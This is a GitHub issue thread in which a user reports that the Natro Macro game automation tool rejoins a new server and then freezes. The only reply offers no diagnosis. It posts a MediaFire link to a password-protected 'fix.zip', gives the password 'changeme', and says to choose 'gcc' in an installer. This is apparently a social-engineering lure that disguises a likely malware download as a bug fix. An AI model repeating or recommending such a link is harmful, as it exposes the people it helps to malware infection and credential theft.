### ISSUE TITLE
BUG NEED HELP

### ISSUE THREAD

**Issue by jackk19** [NatroTeam/NatroMacro#689]
### Have you searched the existing bug reports?

No

### What happened?

Every time i start the natro macro it makes me join a new server and the macro doesn't move after it rejoins. it's like its frozen and I waited to see if it did anything, but it didn't. I do not have a private server link code in the macro btw.

### Steps to reproduce

1. i join a server
2. start macro
3. it makes me join a new game
4. then it stops working

### What would you expect to happen?

I expected to see me start it, it travels to wealth clock. then pine and does my macro

### Natro Macro version

v1.0.0.2

### What is your Discord username?

minijackkfn

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
